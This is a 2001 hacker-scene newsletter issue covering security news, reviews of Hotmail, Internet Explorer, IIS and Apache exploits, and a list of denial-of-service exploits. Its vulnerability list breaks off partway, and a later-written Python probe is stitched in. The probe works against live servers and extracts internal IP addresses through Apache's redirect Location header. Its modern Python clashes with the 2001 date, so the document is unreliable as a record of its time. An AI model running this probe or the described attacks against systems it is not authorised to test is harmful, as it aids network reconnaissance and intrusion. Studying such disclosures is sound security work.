Neworder Newsletter #4
@ New Order Newsletter
Sep 03 2001, 18:00 (UTC+0)

N E w O r D e R / n E w S l E t T e R #4

[ i n t r o ]

Welcome to the fourth NewOrder newsletter. A lot has happened in the 2-3 weeks since the last letter: Linux is 10, Microsoft has been hacked again, Novell users are panicking over their vendor's rush to get them patched, and the Sklyarov case worsens... On a happier note, NewOrder's board has expanded to 40,000+ members since it was recoded, a successful interview with the World Of Hell group was published [http://neworder.box.sk/newsread.php?newsid=4], and the first 3 issues of the newsletter have gone brilliantly. Thanx everyone...

the boxnetwork team

[ c o n t e n t s ]

0x01 news snippets
0x02 exploits in review
0x03 the vulnerability list
0x04 interesting articles
0x05 board notices
0x06 and finally...

[ n e w s  s n i p p e t s ]

Rather than dump out lines and lines of news from the many news sites about the place, which isn't much use to anyone, you can get up-to-date and informative news from many sites across the net. A couple of good ones are theregister.co.uk, zdnet.com and infosyssec.com. Of course, there is NewOrder, with news of interest to the community being updated more than daily by the users. Two stories of particular interest are included with relevant links below...

Russian computer programmer Dmitry Sklyarov could face 25 years in a United States jail after a grand jury upped the stakes, adding conspiracy to his copyright circumvention charges. Sklyarov was arrested earlier this summer at a hotel in Las Vegas for designing a computer program that can circumvent e-book security features. [http://www.newsbytes.com/news/01/169504.html]

Exploiting a hole in Windows 2000, a hacker says he penetrated Microsoft's corporate network earlier this month and had full access to hundreds of the company's computers. Benign claims to have virtually strolled in through the systems' back door, using Windows 2000's TCP port 445, which is open by default to allow file sharing with remote systems. [http://www.newsbytes.com/news/01/169408.html]

[ e x p l o i t s  i n  r e v i e w ]

The world of exploits has had two major killers already this month: one we don't know much about, the other we know lots about but which isn't totally usable, so to speak.

Firstly, Novell have discovered a massive hole in their GroupWise PadLock system. This vulnerability, about which we don't know much beyond the fix URL, can supposedly compromise an entire system/network. It is also assumed (from the tone of the reports and the statement issued) that the vulnerability is remotely exploitable (*1) - there has now been some detail released.

Aside from the big and mysterious hole in Novell's systems, for once in a blue moon Hotmail is hackable. Well, in a way. Details were released on the 19th of this month of a message viewing hole. Don't get your hopes up too much, however: it's not as easy as clicking any old URL. It basically follows this sequence:

1. You log into Hotmail with your own account
2. You send a crafted URL carrying the target's message details through the browser
3. Bingo, top secret (and most likely spam) messages are viewable

I say don't get your hopes up because actually exploiting this successfully is not a trivial task. You first have to get the message ID right for the person's inbox before you can view the message. This ID is basically a timestamp of the message's arrival at the Hotmail server for placing in the inbox, and it is exactly this that makes the exploit hard to use: the timestamp is resolved to seconds, not just minutes, so from discussions on Bugtraq it is looking like a needle-in-a-haystack scenario to actually view messages in someone's account. And to add a further hindrance, it's been patched :) (*2)

A more interesting and useful exploit released on Bugtraq this month has to do with JavaScript. The vulnerability allows data to be written to the registry from Internet Explorer. The author notes that it has only been tested on Windows 98 at the minute, with IE version 5.5. In essence, the code to make this happen has the following structure:

1. Write an ActiveX object to the page
2. Call setCLSID (you'll notice these values in the registry if you run regedit)
3. Call a create instance on the ActiveX object, then get the object and place it in another variable
4. Using a try block, attempt a RegWrite call, which presumably works
5. This is repeated again in the code, as a proof

If you want more details, I would advise going to www.securityfocus.com and searching the Bugtraq archives for 'JavaScript Registry Windows98'. The sample code writes to the SearchList and EnableDNS keys, by the way, if you're interested or accidentally view it. Obviously, this sort of vulnerability is very dangerous: imagine the consequences of viewing a malicious website running this trick, with the page free to write whatever registry values it likes on the visitor's machine...

Looking into the less sensational world of average exploits released lately, there are a couple of interesting ones. Two IIS ones have been released so far, one dealing with a buffer overflow and another, more generic one based on privilege escalation via exploitable scripts and programs. Staying with Microsoft, the Outlook vulnerability that allowed message box data to be grabbed via the ActiveX View control has now been patched (*3), and they have also released a 'cumulative' patch for IIS servers. This patch basically fixes all that was wrong previously as well as a couple of new holes that were discovered (*4).

The Apache attack mentioned in previous articles, which allows the internal network address to be viewed in some cases, has had some exploit code released for it to make people's jobs even easier (*5). The code basically requests a directory URL minus the '/' at the end. This produces a redirect (3xx) response telling the client it needs to do a bit more to get to the page in question, and along with it a 'Location' response header, which Apache builds from its own name or address for the server. If a firewall is in place and the server is behind it, that is the server's internal IP, which is disclosed to the client and allows for further network enumeration.

*1 http://neworder.box.sk/search.php3?srch=groupwise
*2 http://neworder.box.sk/showme.php3?id=5524
*3 http://neworder.box.sk/showme.php3?id=5517
*4 http://neworder.box.sk/showme.php3?id=5522
*5 http://neworder.box.sk/showme.php3?id=5520

[ t h e  p i c k ]

.denial of service exploits

TomCat 3.2.1 - crashing one of the JSP pages with an exception dumps out information useful to an attacker on the default error page [http://neworder.box.sk/showme.php3?id=5525]
glFTPd 1.23 - based on a bug in the LIST command; exploit code is available as UNIX-based Perl [http://neworder.box.sk/showme.php3?id=5515]
SHOUTcast 1.8.2 - sample C code for use; it passes exceptionally long data in a field via HTTP to crash it [http://neworder.box.sk/showme.php3?id=5560]
ARP Table in Windows Networks - C code for Unix included; see issue 3 for details of this attack [http://neworder.box.sk/showme.php3?id=5561]
pcAnywhere 9.2 and 10 (not 9.2.1) - sending lots of random characters immediately on connection [http://neworder.box.sk/showme.php3?id=5511]

.info leakage and file viewing

BadBlue File Viewing
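Returning to the Apache redirect disclosure described under exploits in review: the script below is an added example written for this newsletter's readers, not the exploit code linked at *5 and not anything from the Apache project. It builds the probe request (a directory path with the trailing '/' left off, sent as HTTP/1.0 with no Host header so the server has to supply its own name or address in the redirect), then parses the response and reports a leaked address only when the Location header carries an IP literal from a private range. The sample response, the 10.0.0.5 address and the /icons directory are constructed assumptions for running it offline; `probe()` does the same against a live host if you want to check your own servers.

```python
import ipaddress
import socket
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample of a vulnerable server's answer to "GET /icons" when it builds
# the Location header from its own internal address. The 10.0.0.5 address, the Date
# and the Server banner are assumptions, not a capture from any real host.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Date: Mon, 03 Sep 2001 18:00:00 GMT\r\n"
    b"Server: Apache/1.3\r\n"
    b"Location: http://10.0.0.5/icons/\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b"<HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD></HTML>\r\n"
)


def build_probe(directory: str = "/icons") -> bytes:
    """Raw request for a directory WITHOUT its trailing slash.

    HTTP/1.0 with no Host header is deliberate: the server cannot copy a
    client-supplied host name into the redirect, so it falls back to its own
    idea of its name or address, which is the value we want to see.
    """
    path = "/" + directory.strip("/")
    return ("GET %s HTTP/1.0\r\n\r\n" % path).encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP response into (status code, lower-cased header dict).

    Returns (0, {}) for anything that does not begin with a sane status line.
    """
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        return 0, {}
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def disclosed_internal_address(raw: bytes) -> Optional[str]:
    """Return the private-range IP literal (RFC 1918, loopback, link-local, ...)
    found in the Location header of a 3xx response, or None if nothing leaks."""
    status, headers = parse_response(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return None
    host = urlsplit(headers["location"]).hostname
    if host is None:
        return None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # a host name rather than an IP literal: not an address leak
    return host if addr.is_private else None


def probe(host: str, port: int = 80, directory: str = "/icons",
          timeout: float = 5.0) -> Optional[str]:
    """Send the probe to a live server and report any internal address it leaks.

    Needs network access; the offline demo below uses SAMPLE_RESPONSE instead.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(directory))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return disclosed_internal_address(b"".join(chunks))


if __name__ == "__main__":
    print(build_probe().decode("ascii"), end="")
    print("leaked internal address:", disclosed_internal_address(SAMPLE_RESPONSE))
```

Two things worth noting when you run this against your own servers: a Location header naming a host name rather than an IP literal is reported as clean here, though an unresolvable internal name is still information you may not want to give away; and a 3xx with a public address in it is normal mod_dir behaviour, not a leak.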